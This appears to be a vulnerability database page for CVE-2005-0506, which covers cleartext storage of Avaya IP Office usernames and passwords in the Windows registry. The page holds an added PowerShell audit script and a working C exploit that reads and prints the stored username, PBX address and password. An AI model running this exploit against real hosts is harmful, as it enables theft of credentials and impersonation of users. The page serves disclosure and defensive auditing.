Avaya Sensitive Information Disclosure Vulnerability

Vulnerability ID: 1108483    Vulnerability type: Unknown
Published: 2005-02-24    Updated: 2005-03-14
CVE ID: CVE-2005-0506
CNNVD-ID: CNNVD-200503-108
Platform: Windows    CVSS score: 5.0
|Vulnerability Source
https://www.exploit-db.com/exploits/839
https://www.securityfocus.com/bid/90226
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200503-108
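|Vulnerability Details
Avaya IP Office Phone Manager, IP Softphone and other products store sensitive data in cleartext in registry keys. Local and possibly remote users can steal usernames and passwords through keys such as Avaya\IP400\Generic and impersonate other users.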
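
A defender-side check for the condition described above, as an added example that is not part of the original advisory or exploit: it reports, per host, whether the key holds stored credential values and which principals can read it, without printing the values. The value names are the ones queried by the exploit on this page; the WOW6432Node path is an assumption added for 32-bit installs on 64-bit Windows.

```powershell
# Added audit example (not from the original advisory or exploit code).
# Flags hosts where the Avaya IP400 Generic key stores credential values and
# lists the principals allowed to read that key. Values are never printed.
$paths = @(
    'HKLM:\SOFTWARE\AVAYA\IP400\GENERIC',
    # Assumption: 32-bit software on 64-bit Windows is redirected here.
    'HKLM:\SOFTWARE\WOW6432Node\AVAYA\IP400\GENERIC'
)
# Value names read by the exploit on this page.
$names = 'UserName', 'PBXAddress', 'Password'
$read  = [System.Security.AccessControl.RegistryRights]::ReadKey

foreach ($path in $paths) {
    if (-not (Test-Path -Path $path)) { continue }

    $props  = Get-ItemProperty -Path $path
    # Names of the values that exist and are non-empty.
    $stored = @($names | Where-Object { -not [string]::IsNullOrEmpty($props.$_) })

    # Principals with an Allow entry that covers full read access to the key.
    $readers = (Get-Acl -Path $path).Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       ($_.RegistryRights -band $read) -eq $read } |
        ForEach-Object { $_.IdentityReference.Value } |
        Sort-Object -Unique

    [pscustomobject]@{
        Computer       = $env:COMPUTERNAME
        Key            = $path
        StoredValues   = $stored -join ', '
        PasswordStored = $stored -contains 'Password'
        Readers        = $readers -join '; '
    }
}
```

A host that returns `PasswordStored = True` together with a broad group such as `BUILTIN\Users` in `Readers` is exposed in the way this entry describes.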
|Exploit
#include <windows.h>
#include <stdio.h>
#include <string.h>

/*
    Filename:    exploit.c
    Title:       Avaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit v0.01
    Author:      pagvac (Adrian Pastor)
    Date:        24th Feb, 2005
    Other info:  tested on version 2.013. Compile as a Win32 console application project in Visual C++
*/

/* Read one string value from HKLM\SOFTWARE\AVAYA\IP400\GENERIC into lszValData.
   Returns TRUE only if the key was opened and the value was read. */
BOOL QueryVal(const char *lszVal2Query, char lszValData[255])
{
    char lszResult[255];
    HKEY hKey;
    LONG returnStatus;
    DWORD dwType = REG_SZ;
    DWORD dwSize = sizeof(lszResult) - 1;   /* leave room for a terminating NUL */

    /* ANSI variants are used explicitly because the arguments are char strings */
    returnStatus = RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\AVAYA\\IP400\\GENERIC", 0L, KEY_READ, &hKey);
    if (returnStatus != ERROR_SUCCESS)
        return FALSE;                       /* no handle to close if the open failed */

    returnStatus = RegQueryValueExA(hKey, lszVal2Query, NULL, &dwType, (LPBYTE)lszResult, &dwSize);
    RegCloseKey(hKey);
    if (returnStatus != ERROR_SUCCESS)
        return FALSE;

    lszResult[dwSize] = '\0';               /* registry strings may lack a terminating NUL */
    strcpy(lszValData, lszResult);
    return TRUE;
}

int main(void)
{
    char valData[255];

    printf("\nAvaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit\n");
    printf("By pagvac (Adrian Pastor)\n");
    printf("Tested on version 2.013\n\n");

    // Print username
    printf("Username:\t");
    if (!QueryVal("UserName", valData))
        printf("Error! No permissions to read key value?\n");
    else
        printf("%s\n", valData);

    // Print IP address
    printf("PBX IP Address:\t");
    if (!QueryVal("PBXAddress", valData))
        printf("Error! No permissions to read key value?\n");
    else
        printf("%s\n", valData);

    // Print password
    printf("Password:\t");
    if (!QueryVal("Password", valData))
        printf("Error! No permissions to read key value?\n");
    else
    {
        if (strcmp(valData, "") == 0)
            printf("[blank password]\n\n");
        else
        {
            printf("%s\n", valData);
            printf("Password obsfucated?\n\n");
        }
    }

    return 0;
}

// milw0rm.com [2005-02-24]
|Affected Products
Avaya IP Softphone 0
|References

Source: support.avaya.com
Link: http://support.avaya.com/elmodocs2/security/ASA-2005-041_Sensitive_Info_Leak.pdf
Source: BUGTRAQ
Name: 20050222 Re: Avaya IP Office Phone Manager - Sensitive Information Cleartext Vulnerability
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110910486128709&w=2
Source: BUGTRAQ
Name: 20050222 Avaya IP Office Phone Manager - Sensitive Information Cleartext
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110909733831694&w=2